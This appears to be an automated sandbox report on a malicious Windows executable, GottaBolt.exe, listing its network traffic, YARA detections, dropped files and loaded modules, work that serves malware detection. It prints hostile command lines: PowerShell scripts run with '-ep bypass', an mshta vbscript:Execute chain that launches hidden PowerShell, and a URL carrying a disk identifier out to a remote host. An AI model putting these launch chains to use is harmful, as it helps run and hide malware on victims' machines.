          Source: GottaBolt.exe, 00000000.00000002.1510540109.0000026506698000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.0000026506641000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.0000026506775000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265067C7000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.000002650679E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265066F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfssinstitute.com/?rs=user
          Source: GottaBolt.exe, 00000000.00000002.1510540109.0000026506641000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.0000026506775000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265067C7000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.000002650679E000.00000004.00000800.00020000.00000000.sdmp, GottaBolt.exe, 00000000.00000002.1510540109.00000265066F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfssinstitute.com/?rs=user%7cLNKDPSGXSCSIDiskDevice%7cSCSI%7c6000c298128b8c02a71a2474aeb5f3d
          Source: powershell.exe, 00000011.00000002.1572405293.000002AF48D79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1571572984.000002AF4737B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000011.00000002.1572405293.000002AF48635000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2167514556.0000015A4EF14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000016.00000002.2203282625.0000015A66C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.c
          Source: powershell.exe, 0000000A.00000002.1439564457.000001A94C296000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2741137716.0000017617574000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664130053.000002AF574D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1572405293.000002AF48DD3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1664130053.000002AF57616000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
          Source: powershell.exe, 00000011.00000002.1572405293.000002AF48A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
          Source: GottaBolt.exeString found in binary or memory: https://www.ssl.com/repository0
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownHTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.7:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.91.73.101:443 -> 192.168.2.7:49740 version: TLS 1.2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 mouse low level NULL

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: Process Memory Space: powershell.exe PID: 7948, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FFAACCC56820_2_00007FFAACCC5682
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FFAACCC48D60_2_00007FFAACCC48D6
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FFAACCD00CF0_2_00007FFAACCD00CF
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FFAACCD00E70_2_00007FFAACCD00E7
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FFAACCD01FA0_2_00007FFAACCD01FA
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FFAACCD01D30_2_00007FFAACCD01D3
          Source: C:\Users\user\Desktop\GottaBolt.exeCode function: 0_2_00007FFAACCCD3290_2_00007FFAACCCD329
          Source: GottaBolt.exeStatic PE information: No import functions for PE file found
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: Process Memory Space: powershell.exe PID: 7948, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal69.evad.winEXE@16/17@1/2
          Source: C:\Users\user\Desktop\GottaBolt.exeFile created: C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4220:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5392:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wpovo2su.2ni.ps1Jump to behavior
          Source: GottaBolt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: GottaBolt.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
          Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\GottaBolt.exe "C:\Users\user\Desktop\GottaBolt.exe"
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close")
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close")
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close")
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: netfxperf.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: pdh.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: esentprf.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfts.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: winsta.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: utildll.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: tdh.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: msdtcuiu.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: atl.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: msdtcprx.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: mtxclu.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: clusapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: resutils.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: msscntrs.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfdisk.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: wmiclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfnet.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: browcli.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfos.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfproc.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: sysmain.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rasctrs.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: tapiperf.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: tapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfctrs.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: usbperf.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: tquery.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: perfos.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
